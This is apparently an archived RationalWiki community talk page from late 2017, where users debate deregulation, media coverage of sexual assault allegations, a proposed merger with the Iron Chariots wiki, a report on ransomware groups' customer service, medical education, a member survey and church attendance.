- Anytime I see "deregulation" I think "open gates for the free market to screw everyone over". --It's-a me, LeftyGreenMario!(Mod) 04:43, 9 December 2017 (UTC)
- Or basically "deregulation" is a recipe for disaster. S.H. DeLong (talk) 08:01, 9 December 2017 (UTC)
- Counterpoint: the deregulation of alcohol. There's a reason there's been an explosion in microbrews in the past few decades (in the US at least). Mock hipsters all you want, but there is no compelling reason to prevent hundreds of varieties of beer from existing. Radioactive afikomen Please ignore all my awful pre-2014 comments. 09:19, 9 December 2017 (UTC)
- All depends the way said deregulation is executed and the presence of laws that control it (for consumer protection, safety, etc), as well as those that prevent the formation of oligopolies, etc (things free market bullshitters despise despite being common sense). That said, essential services (water, electricity, etc.) should not be deregulated or at the very least laws to protect those who are in poverty, so they can have access to them, must exist. Panzerfaust (talk) 14:01, 9 December 2017 (UTC)
I think deregulation usually winds up badly, either as a confusing maship or what is a natural monopoly (i.e. the "fake markets" like utilities) or gratuttious price gouging and asset stripping of former state bodies, or the exploitative shitfest that is outsourcing.
However, I think airlines are one, perhaps pretty much the sole, exception to this. Whilst there definitely needs to be some - and more - regulation of aspects of the airline industry when it comes to passenger rights and also minimum acceptable physcial conditions on board (i.e. minimum seat pitches and widths to ensure safety and wellbeing) - the overall reregulation *has* led to a lot of new routes opening (especially in the EU), *much* lower fares and way more choice of carriers.
Another thing I would point to is the simplicity of the ticketing mechanism for airlines. I can buy a ticket online for an inter-continental flight and show up, no paper tickets of any kind needed - all done from a phone or computer. Compare this with booking train tickets in Britain, which have also been privatised and somewhat reregulated, and you do get one good example of how deregulation *can* work.... and how it - far more often - doesn't. TheEgyptian¿Dígame? 15:11, 9 December 2017 (UTC)
Anyone tired of hearing about sexual assaults in the media?[edit]
I cared the first hundred times I heard about sexual assaults to people when reading media. But like murder cases, I simply stopped giving a shit about it. While I'm proud that the victims are stepping forward, does the media need to be a mouthpiece for it? Is this an unpopular opinion? Maybe.—Hamburguesa con queso con un cara (talk • stalk) 20:41, 21 November 2017 (UTC)
- Funnily enough, I have the same weariness of hearing sexual assault case after sexual assault case. I'm hoping the "coming out" allegations the media loves to lap up doesn't backfire or start having a jaded effect on people. --It's-a me, LeftyGreenMario!(Mod) 20:46, 21 November 2017 (UTC)
- Yes, I think the media does need to be a mouthpiece for it, even at the risk of backfiring. In many cases, the victims have few alternatives when the statute of limitations has expired for the victimizer but the risk of libel upon the victims is ever present. The multiple public accusers at once approach gives weight to the evidence and reduces the likelihood of libel proceedings. Bongolian (talk) 22:01, 21 November 2017 (UTC)
- This is an inevitable feeling and the news media recognizes that feeling and will soon back off on pursuing other major sexual assault claims for a while. Which... I guess is just how life goes. Hopefully some kind of systemic progress was made in this burst of activity, but I'm not holding my breath. ikanreed 🐐Bleat at me 22:36, 21 November 2017 (UTC)
It's really fucked up. I want to hear more women testify against guys like Moore, but then I realize I'm hoping for more human misery to be found. At the end of the day, exposing the misdeeds of only significant persons may accomplish nothing for women. When it comes to the manager at McDonalds, who cares in the media?Ariel31459 (talk) 00:06, 22 November 2017 (UTC)
- Reporting crime to law enforcement is perfectly normal. I am, however, a little disappointed to see that many people have forgotten that the accused remains innocent until they confess or are proven guilty. Nerd (talk) 00:34, 22 November 2017 (UTC)
- i believe i have mentioned before about how deeply uncomfortable i am with the way these allegations are reported. i am deeply uncomfortable with allegations like 'he put his hand on my knee at a dinner party' being reported as the same ball park as 'he raped me'. I am deeply uncomfortable with the way these allegations are presented not as allegations but as fact, that a mere allegation will result in the destruction of careers. these are allegations that have not resulted in court cases, have not resulted in police investigations. the reporting of the reporting of these allegations seem to me to make it impossible that any could wind up in court - how could any of the accused hope for a fair trial when they have been declared guilty so comprehensively in news media. i cannot investigate these claims - i am not the police, i cannot even question them. we are told we must believe the victims of sexual assault. we must not doubt them. thats all well and good if an appropriate party ie the police, then goes on to investigate the claims, but here there are few or no investigations. claims are made, regurgitated verbatim thoughout the news media and we cannot question them. to do so makes us monsters. any claims of literally anything else, we would question them. any other claim from a group people i would not trust to accurately describe their breakfast i would read with a raised eyebrow and a hefty pinch of salt at the he said/she said. i am not comfortable to do so here. some of the claims are horrific. some of the claims are so minor that id question that it was even sexual assault/harassment. some are just plain outlandish. i understand that statute of limitations makes this the only option for many of the victims, but is this really the way to go? there are so many claims, about so many people, they cant really all be true can they? someone said the risk of libel is a very real threat to the accusers - is it though? the accused could win but their career and reputation would still be trashed. i am uncomfortable about all of this. i uncomfortable withn the fact that i am convinced of the guilt of some these people purely because i read report of an allegation. i am uncomfortable that i could be excusing some truely awful crimes. i fear the deluge of claims will become so widespread, so common, that while kevin spacey is airbrushed from his films and weinsteins career is finished, a year from now we will read about some star groping an extra and go straight and watch his latest box office smash. we will believe the claims if we dislike the person, if we like them we'll and believe its just a publicity seeker. but i guess thats the status quo - michael jackson died a paedophile while statutory rapist david bowie died a rock legend. i just dont see how justice is served by this perfect storm of celebrity and righteous indignation when the end result is likely not just a jaded public, but a disbelieving oneAMassiveGay (talk) 01:56, 22 November 2017 (UTC)
- I hate the way this country treats artists. What would contemporary America do to Van Gogh or Picasso, I wonder?
- And to the extent I am a liberal, I am an old fashioned ACLU liberal. Due process and the presumption of innocence are more important to me than any moral panic, no matter how 'feminist' it is.
- The other thing that occurs to me is that it's much easier to wrong-foot Democrats and liberals by this sort of thing.
- Republicans and right-wingers will, of course, circle the wagons, as we're seeing in the case of Roy Moore. For Alabama voters, the choice between a child molester and a liberal is a difficult moral quandary. Roy Moore may have chased children, but he stands up for the piss-ant god they worship down there.
- On the other hand Democrats have to at least pay lip service to "feminism", whatever it means anymore. These things target key Democrat constituencies. They implicate Democratic human-resources pieties and 'professional' standards. They have invested a great deal in that kind of elite etiquette. It's much harder for them to shake off these charges levelled against their leadership, no matter how stale or how trivial they may be. There isn't a level playing field when it comes to this sort of carrying on. It didn't get Hillary Clinton elected, for one thing. Then again, she was a uniquely compromised bearer of any message about men behaving badly. There does come a time when you have to swallow everything you've been taught and root for the home team. - Smerdis of Tlön, LOAD "*", 8, 1. 02:34, 22 November 2017 (UTC)
- this is an interesting read AMassiveGay (talk) 22:20, 23 November 2017 (UTC)
- Yes Hamburger. What could be more tedious than famous popular figures and politicians being exposed for sexual harassment and rape. I certainly don't want to hear more about hundreds of women putting their career and personal lives on the line to expose predators and hopefuly put a permanent door stop in front of extreme apathy and disbelief of abuse. What could be less interesting than a major social shift slowly unraveling. Every time I read about a new public figure denounced by a dozen women, I'm like...hello...that news is like so October 2017! My greatest hope is that the whole story just goes away and we can get back to not giving a shit about murders and political corruption and police abuse and banking fraud. 87.218.198.157 (talk) 02:45, 24 November 2017 (UTC)
- Well, you're not wrong (going by your intent because you're obviously being sarcastic).—Hamburguesa con queso con un cara (talk • stalk) 04:07, 24 November 2017 (UTC)
- I've seen 'believe the victims' before. It tends not to end well. Inviting people to re-remember thirty year old memories as outrages they weren't at the time, and then using these half-remembered tales to destroy the careers of a variety of public figures, couldn't possibly go wrong, now could it? - Smerdis of Tlön, LOAD "*", 8, 1. 18:34, 24 November 2017 (UTC)
- But why now? Why do people have to wait until after someone is famous to raise accusations?—Hamburguesa con queso con un cara (talk • stalk) 18:49, 24 November 2017 (UTC)
- Is that really what is happening? In the Roy Moore case, many of the victims had told people about Moore's behavior long ago. It is only recently that media bigwigs have been sending their reporters out to look for them. "See? The system works," etc.Ariel31459 (talk) 14:48, 25 November 2017 (UTC)
Roy Moore is an outlier here. AFAIK he doesn't have a talent that ought to cut him some slack. He also has the whole hypocrisy going for him: he wants to regulate other people's sex lives, which I'm against as well. (And I try to make that principle a 'seamless web'.) He's exceptionally easy to hate, which lends his accusers credibility if you hate him as well. He still deserves the same grace of due process, and leaving the distant past lie, that everybody else deserves. - Smerdis of Tlön, LOAD "*", 8, 1. 18:37, 25 November 2017 (UTC)
- I think that this is a good thing. The media coverage of Cosby and Trump and Ailes and O'Reilley and Moore and Franken, etc. does pose the danger of making us jaded but maybe making this commonplace is not a bad thing. Women did not speak up at the time because they feared that they are alone or that they would not be supported. Perhaps, if harassment is recognized as commonplace, women will not be as reticent to speak up. That doesn't mean we shouldn't draw a distinction between President Bush Sr and (the allegations against) Moore -- Taking advantage of being in a wheelchair to make a lewd remark is not on the same level as what Moore is accused of -- but I hope this all leads to women (and girls, in Moore's case) feeling empowered to act, should they find themselves in similar situations (albeit, one action would entail a reprimand and the other would hopefully entail arrest) --Bertrc (talk) 22:45, 28 November 2017 (UTC)
- And now Senator Al Franken has resigned because of this crap. I wonder if the 'feminists' realize that they've scored an own goal. - Smerdis of Tlön, LOAD "*", 8, 1. 19:31, 7 December 2017 (UTC)
- Yes, I just hope the senate democrats didn't push Franken out thinking it could make Alabama voters come to their senses. Moore may not win, but I doubt the Franken affair will will have anything to do with it.Ariel31459 (talk) 01:51, 8 December 2017 (UTC)
- I'm okay with Franken's move. His statements and his actions have been exemplary; I can't imagine this not, ultimately, driving us in the right direction. I always tell the young'uns to show patience so I guess it is time for me to practice what I preach. Times like this remind me why I am glad I'm a Christian. Faith that God can not only fix the messes we make, but actually transform them in their entirety (even, retroactively, the making of the messes, themselves) into something good keeps me from despair. ;-) :-P~ :-D I just hope we don't have to be stuck in this Babylon for 70 years . . . --Bertrc (talk)
- If the criminal justice system decided to proceed against what Franken actually did, it would have gotten pled down to a minor misdemeanor at most. And that would be the correct resolution by law and precedent. This is how we reward someone who gave up a life of successful minor celebrity to serve his country. If this is what feminism demands, then fuck feminism. - Smerdis of Tlön, LOAD "*", 8, 1. 04:43, 11 December 2017 (UTC)
Put out the fire![edit]
This week's flaming bag of garbage is Angela Merkel. —Goat-Emperor Bigs (Words of Wisdom/Achievements) 20:04, 4 December 2017 (UTC)
- Weren't most of the attacks either committed by people who entered the country before 2015,or had been raised in the country? ShiningSwordofThoughts (talk)
- @ShiningSwordofThoughts RW:DUMP —Fake News™ (talk/stalk) 03:44, 5 December 2017 (UTC)
- Angela Merkel is quite possibly the world's least interesting politician. - Smerdis of Tlön, LOAD "*", 8, 1. 17:29, 5 December 2017 (UTC)
- I see your Merkel and raise you 1 Emanuel Marcon. ikanreed 🐐Bleat at me 17:31, 5 December 2017 (UTC)
- interesting politicians usually means a shit show. good politics should be tedious AMassiveGay (talk) 00:41, 7 December 2017 (UTC)
- Probably just being a devil's advocate because this is rationalwiki and we all do it, but tedious politics usually means a disinterested electorate, leaving only the spite voters to decide everything. And then you get a trump. ikanreed 🐐Bleat at me 18:29, 7 December 2017 (UTC)
- the political climate has been far from mundane in the US long before trump. Probably more of a contributor to trump than a disinterested electorate. AMassiveGay (talk) 19:55, 11 December 2017 (UTC)
Why is the term Orient offensive?[edit]
I just thought why is reffering to someone as Oriental a bad thing? I can really only see it offensive in the sense that it generalizes a large group of people.— Unsigned, by: ShiningSwordofThoughts / talk / contribs 16:25, 11 December 2017
- Firstly, please sign your posts on talk pages with ~~~~ (usually shift and the key above the left tab). That'll automagically sign you username with a timestamp.
- I googled your title, got the following; The basic reason is it was used as a slur for long enough to become one, and hasn't been reclaimed even to the extent that the quite analogous n* has been.Daev (talk) 09:47, 11 December 2017 (UTC)
- PS The term 'Orient' not so much offensive as out-dated. Referring to someone as '(an) Oriental' is the problematic usage.Daev (talk) 09:53, 11 December 2017 (UTC)
- It also seems to be a problem that only exists in North American English. Does anybody refer to Middle Easterners as 'southwest Asians?' - Smerdis of Tlön, LOAD "*", 8, 1. 16:31, 11 December 2017 (UTC)
- So are these people offside? Anna Livia (talk) 16:48, 11 December 2017 (UTC)
Merging Iron Chariots Wiki (sticky)[edit]
Older RatWiks may know that RW merged in EvolutionWiki, a wiki dedicated to documenting evolution science and debunking intelligent design / creationist arguments, after that site became inactive and lost the funds to host itself (see EvoWiki and RationalWiki:EvoWiki).
Iron Chariots Wiki appears to be on route to suffer the same fate. Iron Chariots is an explicitly atheist wiki dedicated to documenting arguments for and against god and about atheism in general. The site hasn't had any edits since September 6 -- two months ago. The forums are offline. The bottom of every page proudly displays two PHP error messages. Relevant links:
- List of administrators (many of whom are on the Atheist Experience podcast)
- The only active editor (and only active admin) in the past 3 months
- The site doesn't appear to have explicitly copyrighted anything
In short: the site has gone Citizendium'd. Do we want to try to contact Iron Chariots Wiki and merge in their content? (@Tmtoulouse, @David Gerard, @Human, @Reverend Black Percy, @Spud) Mʀ. Wʜɪsᴋᴇʀs, Esϙᴜɪʀᴇ (talk/stalk) 14:07, 6 November 2017 (UTC)
- I would have no objections. SpacePriusIs always watching 15:49, 6 November 2017 (UTC)
- My opinion is irrelevant but I'd say yeah. Christopher (talk) 16:57, 6 November 2017 (UTC)
Copyright is the issue. Everything is born "all rights reserved" by default. If it wasn't under any licence, we have a problem unless we get permission from each individual contributor. (We sort of arsed it through with EvoWiki ...) - David Gerard (talk) 17:15, 6 November 2017 (UTC)
- It appears to be licensed under Creative Commons but it's an earlier version (2.5, we're 3.0) theirs and ours are compatible though aren't they? Christopher (talk) 17:38, 6 November 2017 (UTC)
- It looks like copyright isn't a problem. OK. Merge them into us and salvage anything useful from them. Spud (talk) 18:00, 6 November 2017 (UTC)
- @Christopher Thanks for finding that. The Iron Chariots Wiki license is CC-BY-SA-2.5, better if anything than EvoWiki's CC-BY-NC-SA-1.0, and definitely compatible with our CC-BY-SA-3.0. Herr FüzzyCätPötätö (talk/stalk) 19:10, 6 November 2017 (UTC)
- It seems like a reasonable merge to me and can follow the strategy used for EvoWiki. What we did with EvoWiki was to move EvoWiki onto our server then have it exist there for the duration of the porting process. Editors who were interested would take non-stub pages and convert them into RW style within RW and include a category link indicating that it was ported (Category:EvoWiki ports). After the port was complete, the EvoWiki page was replaced with a redirect to the corresponding RW page. @FuzzyCatPotato knows the details of this better than I do. Bongolian (talk) 19:15, 6 November 2017 (UTC)
- If the copyright issue can be solved (and it looks like it can) this sounds like a decent idea. Boredatwork (talk) 19:48, 6 November 2017 (UTC)
- Soounds good to me! RoninMacbeth (talk) 20:17, 6 November 2017 (UTC)
- Let's do it. —Goat-Emperor Bigs (Words of Wisdom/Achievements) 23:52, 6 November 2017 (UTC)
I'm glad there is interest in this getting done. I was the main contributor to IronChariots over the last few years. I have not had any response from the server admin Russell, my main contact, on updating Mediawiki software or getting more disk space, which I suspect is the underlying problem. They don't seem to have the time to commit to the project although Matt Dillahunty occasionally plugs the site. I'm still wondering what my involvement will be or what will happen to the site eventually. I will consider continuing to work on this within RationalWiki but the tone of RationalWiki is a little different :) TimSC (talk) 21:50, 7 November 2017 (UTC)
- You're welcome to stay here, good sir. RoninMacbeth (talk) 22:55, 7 November 2017 (UTC)
- If the site owners have no issues, go ahead. — Unsigned, by: 195.235.239.101 / talk
There are a few issues. The first, and most obvious, is whether the current owners think such a merger would be appropriate.
The second is the fact that RW is not explicitly an atheist site. To all intents and purposes it is, but we have historically avoided describing ourselves as such. I'm guessing that would have to change if we incorporate Iron chariots.
There is the question of the differing tone of the two sites - though RW's tone seems to be rather less jokey these days.
Finally there is the question of the work involved in incorporating the material. Saying "let's do it" is fine, but are those who are in favour also volunteering to do the work incorporating the articles? Bob"Life is short and (insert adjective)" 11:10, 8 November 2017 (UTC)
- There may be a plurality of non-believers on RW, but it is by no means an atheist site. There are other users here with a variety of religious beliefs. It should also be noted that some religions are not incompatible with atheism (e.g. Hinduism). I think that regarding the tone difference between the two wikis, it would be worthwhile, @TimSC, to compare the tone in our Category:Logic pages, which I think tend to be more in line with those at Iron Chariots (lower levels of snark). Bongolian (talk) 21:38, 8 November 2017 (UTC)
- I had similar thoughts, but we do actually have pages for a lot of the same topics as Iron Chariots already. They fit in with RW's mission in the sense that these arguments often invoke pseudoscience or questionable logic. (There are also already some pages on RW that seem to exist primarily because people here are interested in atheism and apologetics, rather than because they directly relate to RW's "mission" regarding crank ideas.) With some tweaks, we could absorb much of Iron Chariots without making RW any more atheist-leaning than it already is.
- I think that the real problem is that the TAE folks probably wanted Iron Chariots to be viewed as a somewhat "scholarly" resource, and RW's snark would undermine that image. So even if they're OK with content being copied over, they might not want Iron Chariots to be
swallowed whole byformally merged into RW. Quantheory (talk) 00:13, 9 November 2017 (UTC)
I have IronChariots (and RationalWiki) pages linked in several easy copy pastas I give to people to refute certain categories of arguments or teach them the underlying logic; IC sometimes covers thing in greater depth than RW and for my purposes I IC's tone is much better. I suspect many others share my appreciation for a "scholarly" go to resource to refute theistic claims; on RW you're always two clicks away from goat jokes. Lord Aeonian (talk) 23:26, 10 November 2017 (UTC)
Decided to actually have a look at it, and there seems to be some good info. I think our main issue is lack of organisation, no doubt most of their pages are similar to ours but look! It's so organised! —Kazitor, pending 11:14, 11 November 2017 (UTC)
- I have no strong interest in atheism, myself. But given that we appear to have reasonably congruent articles on most of the subjects they cover, it might help just for the sake of priorities to make note of articles they have that we don't. - Smerdis of Tlön, LOAD "*", 8, 1. 01:52, 20 November 2017 (UTC)
This comment is to prevent archivist from archiving for a while. —Kazitor, pending 04:27, 12 December 2017 (UTC)
Dropped?[edit]
The original thread's been archived. Just wondering, has this idea been dropped? 87.192.220.205 (talk) 15:54, 17 November 2017 (UTC)
- It shouldn't have been -- Archivist is acting up. Fuzzy "Cat" Potato, Jr. (talk/stalk) 16:22, 17 November 2017 (UTC)
- Reminder to self Cømяade FυzzчCαтPøтαтø (talk/stalk) 23:29, 23 November 2017 (UTC)
Aww[edit]
Your little atheist playgrounds can't survive on their own? What ashame. :P 73.91.2.168 (talk) 03:49, 6 December 2017 (UTC)
- The size of one's fanbase does not necessarily correlate with how correct they are. ΛίνΡ (ομιλία) (συνεισφορές) @ 03:54, 6 December 2017 (UTC)
- Never said it did, but remember that next time numbers are in your favor. 76.3.172.194 (talk) 03:58, 6 December 2017 (UTC)
- They want a resume in order to edit it. No wonder they are practically dead. Good riddance, one less cesspool on the internet. 76.3.172.194 (talk) 04:06, 6 December 2017 (UTC)
Ransomware "customer service"[edit]
Here's an interesting report from last year that I just stumbled on: a evaluation of the "customer service" provided by 5 different ransomware "families".[11]
Bongolian (talk) 05:09, 9 December 2017 (UTC)
- It is bad when criminals can provide better costumer service. --Rationalzombie94 (talk) 15:26, 9 December 2017 (UTC)
- Ah, I see these crooks plan their crimes with sustainability. This is both impressive and deeply saddening. GrammarCommie (talk) 16:03, 9 December 2017 (UTC)
- It makes sense. If they provide good customer service - something that's difficult to find from legitimate businesses - their marks are much more likely to come back. But I agree with the above, very depressing. 98.110.112.28 (talk) 16:21, 9 December 2017 (UTC)
- Onion marketplaces have a couple websites, such as deepdotweb.com, to rate markets that can sell illegal content. So yes, this is a thing.—Hamburguesa con queso con un cara (talk • stalk) 21:51, 9 December 2017 (UTC)
This should be a lesson to businesses[edit]
Provide better services. --Rationalzombie94 (talk) 14:05, 12 December 2017 (UTC)
Medical Education: Current Standards or based on pure competence?[edit]
Watching Grey's Anatomy, the character George O'Malley fails his intern exam by one point and stays an intern yet is a good doctor. That leads to my question: Should medical education be based on competence? It just got me thinking about it. What do you think? --Rationalzombie94 (talk) 00:37, 10 December 2017 (UTC)
- "Should medical education be based on competence?" I don't don't understand the question as worded.Bob"Life is short and (insert adjective)" 20:12, 10 December 2017 (UTC)
Reworded: Should there be less emphasis on paper tests and more on practical skill?[edit]
I think that professional education should be based on if you can do the job than doing a test --Rationalzombie94 (talk) 18:10, 11 December 2017 (UTC)
- I want my doctor to be thoroughly versed on as much as possible (an enormous human brain library of every tiny corner of the body, problems with the body, treatments, medicine, side effects, alternatives, risk and so on. My friends who studied medicine basically said they had to memorise enormous lists of body parts, chemicals, treatments etc and that it is all very useful.
- As far as I know...the practical part starts once someone is a resident. They begin by observing and doing very little and then spend a few years doing increasingly more important tasks. And once that is over, at least in the European countries I know, you still have a couple years as an initiate before you can take your final training and examination in the specialty you decided. I am not sure you have to prioritise either. Studying enormous lists of theory first. Practice later (with some more theory on the go), back to studying a topic deeply, then practice with some more studying. A doctor never stops studying and is constantly adapting to changes in medicine. This is all second hand information but my various friends who went through the residency say it makes sense. 87.218.199.123 (talk) 18:52, 11 December 2017 (UTC)
- Here's your(Ratzombie's) problem: thinking critically and understanding the world through application of theory are important skills that have very little to do with most careers but positively affect people. Tests aren't a particularly powerful way to examine that, neither are homework, nor essays, or presentations. But in aggregate, they show something about what students are taking away from a class. You don't want to live in a world of job-doing robots, especially since actual job-doing robots are just over the technological horizon. ikanreed 🐐Bleat at me 19:36, 11 December 2017 (UTC)
- I am a rat now? I am cool with it. Anywho, I didn't mean getting rid of tests. I am just saying- focus more on practical skill on the graduate level. Undergraduate testing, I have no problem with. I admit I worded what I meant wrong. --Rationalzombie94 (talk) 14:04, 12 December 2017 (UTC)
- But ... at some point you have to assess how good that skill is. You need some way to assess it, some way to test it.
- I suspect that what you are getting at is something like the difference between practical skill and abstract knowledge.
- But (I suspect) that the balance between the two things will be different depending on the specialty. (This is also going to be true in other areas of life in addition to medicine.) For example if you are a surgeon a taxidermist or a pianist than practical physical skill is going to be at a premium - though obviously theoretical knowledge is needed too. On the other hand if you are a pneumologist an academic historian or a musical composer then actual physical skills will be less important.
- But even if you only focus on physical skills - you're still going to have to test those skills if you are going to give people qualifications. Bob"Life is short and (insert adjective)" 21:31, 12 December 2017 (UTC)
RationalWiki Community Survey 2017[edit]
I want to know more about who actually writes RationalWiki. To that end, I made a community survey (RationalWiki Community Survey 2017) that covers identity, religion, and politics sections. The religion and politics sections are both based on academic literature, so I'm interested to see how RationalWiki fares (results here). If nobody has any objections, I'd like to put the link into MediaWiki:Sitenotice for a week or so. Mʀ. Wʜɪsᴋᴇʀs, Esϙᴜɪʀᴇ (talk/stalk) 20:14, 9 November 2017 (UTC)
- I second the motion. —Goat-Emperor Bigs (Words of Wisdom/Achievements) 16:33, 10 November 2017 (UTC)
- Likewise. Nerd271 (talk) 16:42, 10 November 2017 (UTC)
- I don't really see the point personally, didn't we do one of these earlier in 2017? Christopher (talk) 17:11, 10 November 2017 (UTC)
- @Christopher I had about 10 people take a draft version. 32℉uzzy; 0℃atPotato (talk/stalk) 17:57, 10 November 2017 (UTC)
- Oh, so it was just a draft. I didn't get that ping btw (they don't seem to work in non talk namespaces). Christopher (talk) 18:32, 10 November 2017 (UTC)
- @FuzzyCatPotato Sure.-💎📀1️⃣ (talk) 22:48, 10 November 2017 (UTC)
- Also, make sure to fix this broken link from page 4 of the survey.-💎📀1️⃣ (talk) 22:56, 10 November 2017 (UTC)
I still think the questions from 1 to 9 are quite poor and it's very US-centric (I took the survey without submitting and had to look up "British equivalent of high school" for instance). Christopher (talk) 08:34, 11 November 2017 (UTC)
- Yep. I could feel the American-ism from the values test. And we have a North Korean editing this site?????? —ClickerClock (talk) 10:31, 11 November 2017 (UTC)
-
- We apparently have an editor in North Korea who, being a white Hindu, is unlikely to be a native of North Korea and might well have clicked on Korea (North) instead of Korea (South) by mistake. That brings me nicely to what I was going to say. It would be nice to have separate choices for country of origin and country of residence. I live in Taiwan but I'm not Taiwanese. And previous Saloon Bar conversations suggest that we have some Brits living in Spain editing here. Spud (talk) 06:29, 12 November 2017 (UTC)
- I took it even though it's hosted by Google. Surely you can do better than that? But certainly some of the later 1-9 questions didn't seem applicable. I suspect the last ones probably apply mostly to particular country? —Kazitor, pending 11:07, 11 November 2017 (UTC)
- As whoever it was said - being born in a stable does not make you a donkey. Anna Livia (talk) 22:48, 12 November 2017 (UTC)
- Some person apparently is 150 and living in North Korea. Seems legit!Do You Believe That?-💎📀1️⃣ (talk) 00:02, 19 November 2017 (UTC)
- @DiamondDisc1So that's where the food and medical aid went. They have a doctoral degree, too, and are a committed Marxist-Leninist
until they sail their submarine towards the U.S. coast to either immigrate or start a war. Nerd (talk) 02:12, 19 November 2017 (UTC)
- Someone needs to tell Norway that Bouvet Island isn't uninhabited anymore.-💎📀1️⃣ (talk) 02:42, 22 November 2017 (UTC)
- This is why I joined RationalWiki, I get to meet people from so many interesting places and laugh about it. GrammarCommie (talk) 02:58, 22 November 2017 (UTC)
- I'm glad this wiki lets nonexistent people edit!-💎📀1️⃣ (talk) 02:36, 23 November 2017 (UTC)
- @DiamondDisc1 Diversity is our strength.Do You Believe That? Nerd (talk) 16:30, 22 December 2017 (UTC)
- @Nerd Yes, why should nonexistent people be discriminated against?-💎📀1️⃣ (talk) 04:22, 23 December 2017 (UTC)
I'm going to close the survey this Friday. Mʀ. Wʜɪsᴋᴇʀs, Esϙᴜɪʀᴇ (talk/stalk) 08:21, 23 November 2017 (UTC) @FuzzyCatPotato this is like the third time I've had to put this topic back. Please fix Archivist :) —Kazitor, pending 04:21, 11 December 2017 (UTC)
Survey results[edit]
Survey is closed. I'll publish results tomorrow. αδελφός ΓυζζγςατΡοτατο (talk/stalk) 04:38, 25 November 2017 (UTC)
- Still waiting...-💎📀1️⃣ (talk) 02:23, 26 November 2017 (UTC)
- I was wondering about that too. Bob"Life is short and (insert adjective)" 21:11, 26 November 2017 (UTC)
- FuzzyCatPotato is still in a meeting with David Rockefeller at the Eiffel Tower. He will be back when the NWO takes over. INFO WARS *WHAAAAAAAAAM*—Hamburguesa con queso con un cara (talk • stalk) 21:15, 26 November 2017 (UTC)
- @FuzzyCatPotato—Hamburguesa con queso con un cara (talk • stalk) 22:26, 26 November 2017 (UTC)
- @FuzzyCatPotato-💎📀1️⃣ (talk) 02:36, 27 November 2017 (UTC)
- @FuzzyCatPotato I smell a conspiracy. Cosmikdebris (talk) 03:46, 27 November 2017 (UTC)
- @FuzzyCatPotato Do the results somehow contain evidence for the Illuminati?-💎📀1️⃣ (talk) 05:22, 27 November 2017 (UTC)
- i suspect its taking some time to make the results appear interesting and not blindingly obvious 12:07, 27 November 2017 (UTC)
@FuzzyCatPotato, what do you mean publish them? They're already viewable. Christopher (talk) 15:42, 27 November 2017 (UTC)
- sorry everyone -- i thought i'd have a chunk of free time to nicely sort & graph the results. i promise by next monday! Herr FuzzyKatzenPotato (talk/stalk) 03:41, 28 November 2017 (UTC)
I've got the results ready (in an un-pretty form). However, I thought it might be nice to release the survey results + editcount results on January 1st, since then we could compare the 2017 survey and 2017 edit patterns in one go. Does anyone vehemently oppose releasing both results on the 1st? Sir ℱ℧ℤℤϒℂᗩℑᑭƠℑᗩℑƠ (talk/stalk) 02:08, 4 December 2017 (UTC)
Can this be archived yet?[edit]
-💎📀1️⃣ (talk) 05:32, 14 December 2017 (UTC)
- Probably. I've just been putting it back because nobody's actually removed "sticky" from the title. —Kazitor, pending 07:56, 15 December 2017 (UTC)
Fundies are their own worst enemy[edit]
As you know, I have no problem with religion. That being said, if you have rules in your churches/church schools that are ultra strict and have no room to do anything fun, you will have people leave a church/religion for atheism or a more liberal faith. Hell, where I live, many fundie churches closed due to low attendance. The other churches (Methodist, Episcopalian, Catholic, Baptist and so on) are doing just fine. Maybe if these places didn't make strict rules unrelated to the bible, they would probably have more members. Thoughts? --Rationalzombie94 (talk) 18:56, 7 December 2017 (UTC)
- Many leave those denominations, but those who stay will listen to your every word. —Fake News™ (talk/stalk) 19:04, 7 December 2017 (UTC)
- Indeed. That's also the problem with my idea to redirect asteroids into the Vatican, Mecca and Jerusalem (so that it looks like God destroyed them). The moderates and decent people will leave. The crazy rabid literalists will be the ones who remain. --TeslaK20 (talk) 19:29, 7 December 2017 (UTC)
- "That being said, if you have rules in your churches/church schools that are ultra strict and have no room to do anything fun, you will have people leave a church/religion for atheism or a more liberal faith." I'm not at all sure that is true. For example ISIS had no problem picking up followers. It may the case where you live, but that doesn't mean it's a general rule.Bob"Life is short and (insert adjective)" 13:08, 8 December 2017 (UTC)
- Seconded. In the Assemblies of God we had a 2m-wide board upon which the folks who ran the church let you know exactly what media was forbidden: Ghostbusters, Mighty Mouse, everything Disney, Murphy Brown, Pee Wee's Playhouse, Blockbuster Video (crime: stocking unrated titles!), Dungeons and Dragons, to name just a few. I have fond memories of asking questions in Sunday School (Mrs. Cain, etc.) only to be physically beaten by my fellow students afterwards, which the pastor framed as being my fault for asking questions to begin with. The totalitarian approach is the appeal for people who don't want the real enemy, doubt, in their lives or minds. Semipenultimate (talk) 17:02, 8 December 2017 (UTC)
- The other churches (Methodist, Episcopalian, Catholic, Baptist and so on) are doing just fine. You know that Pensacola Christian College and Liberty University are Baptist, and Bob Jones was a Methodist, right? You must be talking about straight up cults like Jehovah's Witness, Christian Science, and Scientology. 73.91.3.45 (talk) 19:48, 11 December 2017 (UTC)
- I was talking about the local churches where I live. According to church planting books I have read, totalitarian approaches are killing local churches. Back in 2016 is when I tried going to church again. One I went to was very homophobic (in an ironic twist: the sermon when homophobia came up was about the teachings of Jesus). --Rationalzombie94 (talk) 01:56, 16 December 2017 (UTC)
Your Thoughts on UBI?[edit]
I was watching a Kurzgesagt Video on UBI and it made me actually think for a moment your thoughts? — Unsigned, by: ShiningSwordofThoughts / talk / contribs
- I really like that video. I cautiously support implementing it. (Apparently, they want to give it a try in Hawaii and Finland.) Nerd (talk) 16:26, 22 December 2017 (UTC)
Nationalist China[edit]
What do you guys think would've happened if the KMT won? And yes, it was possible, and likely would've happened if a certain someone hadn't fucked it all up! And yes, I am aware it would still be pretty shitty afterwards, due to authoritarianism and the whole "Tibet and Xinjiang" thing. But in the end, it would probably be better than our China. Bigs (talk) 22:21, 9 December 2017 (UTC)
- Given the cold war tensions at the time, I'm not sure it'd have ended much differently. The Communist forces were huge, and the absolutely massive and mostly remote border with the USSR would have made it impossible to have stopped them being constantly resupplied. The USA had minimal interest in getting sucked in to an intervention, so I think the KMT were only ever really playing for time in the hope someone would help. To be honest, Taiwan is lucky to have survived as long as it has - long enough that we now live in a media age where the PRC is more conscious of it's reputation and what it would loose in terms of respect if it directly and blatantly invaded. Had China had the naval power it's now accruing 30-40 years ago, Taiwan would be destroyed.
